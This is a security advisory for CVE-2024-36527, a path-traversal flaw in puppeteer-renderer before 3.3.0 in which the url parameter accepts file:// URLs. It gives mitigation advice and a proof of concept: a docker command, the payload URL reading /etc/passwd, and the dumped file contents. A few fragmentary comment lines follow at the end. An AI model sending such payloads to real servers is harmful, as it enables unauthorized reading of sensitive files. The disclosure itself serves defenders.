CVE ID: CVE-2024-36527
Description:
puppeteer-renderer is a service that can render web pages using Puppeteer. There is a vulnerability in this service where the url
parameter is not validated to restrict it to only http
or https
protocols. This allows an attacker to use the file
protocol to perform a path traversal attack.
Impact:
An attacker can exploit this vulnerability to read arbitrary files on the server, potentially gaining access to sensitive information.
Affected Versions:
puppeteer-renderer versions prior to 3.3.0.
Mitigation:
Users should update to version 3.3.0 or later where this issue has been addressed. Additionally, ensure that input validation is implemented to restrict the url
parameter to only http
and https
protocols.
Proof of Concept:
The following example demonstrates how an attacker can exploit this vulnerability:
- Start server using docker:
docker run -d --name renderer -p 8080:3000 ghcr.io/zenato/puppeteer-renderer:v3.2.0
- Payload:
http://localhost:8080/html?url=file:///etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
node:x:1000:1000::/home/node:/bin/bash
messagebus:x:100:102::/nonexistent:/usr/sbin/nologin
pptruser:x:999:999::/home/pptruser:/bin/sh
References:
Reported by:
Zac Wang
probably should be:
right so that it matches the:
?